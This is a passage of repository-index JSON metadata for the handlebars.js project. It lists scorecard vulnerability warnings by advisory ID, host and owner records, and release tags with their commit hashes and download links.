GHSA-xvch-5gv4-984h","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-28xh-wpgr-7fm8","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-hrpp-h998-j3pp","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-x3m3-4wpv-5vgc","Warn: Project is vulnerable to: GHSA-c2qf-rxjj-qqgw","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-3jfq-g458-7qm9","Warn: Project is vulnerable to: GHSA-5955-9wpr-37jh","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-r628-mhmh-qjhw","Warn: Project is vulnerable to: GHSA-9r2w-394v-53qc","Warn: Project is vulnerable to: GHSA-qq89-hq3f-393p","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-7p7h-4mm5-852v","Warn: Project is vulnerable to: GHSA-wr3j-pwj9-hqq6","Warn: Project is vulnerable to: GHSA-cf66-xwfp-gvc4","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h","Warn: Project is vulnerable to: GHSA-j8xg-fqg3-53r7","Warn: Project is vulnerable to: GHSA-3h5v-q93c-6h6q","Warn: Project is vulnerable to: GHSA-776f-qx25-q3cc"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-19T09:08:48.273Z","repository_id":998342,"created_at":"2025-08-19T09:08:48.274Z","updated_at":"2025-08-19T09:08:48.274Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281453692,"owners_count":26504232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-28T02:00:06.022Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0